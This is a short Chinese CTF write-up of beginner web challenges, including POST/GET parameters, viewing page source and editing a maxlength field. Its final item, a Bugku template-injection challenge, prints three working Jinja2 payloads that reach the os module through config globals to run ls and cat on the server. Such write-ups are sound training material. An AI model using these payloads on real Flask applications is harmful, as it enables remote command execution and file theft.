1.CTF-web基础$_POST
(1) 题目:
$what=$_POST['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';
(2) 解题关键:hackber插件
2、滑稽
解题方法:
直接按F12,查看“body”就能得到flag
3、计算器
发现只能输入一位数
解题方法:
把maxlength的值改成2、3······(值为几代表能输入的为几位)
最终输入计算结果得到flag
4、GET
(1) 题目
(2) 解题方法:
直接在ip后加“/?What=flag”
5、bugku–Simple_SSLI_2
(1) 题目
(2) 解题方法
分别在IP后加上:
①/?{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}
②/?{{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}
③/?{{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}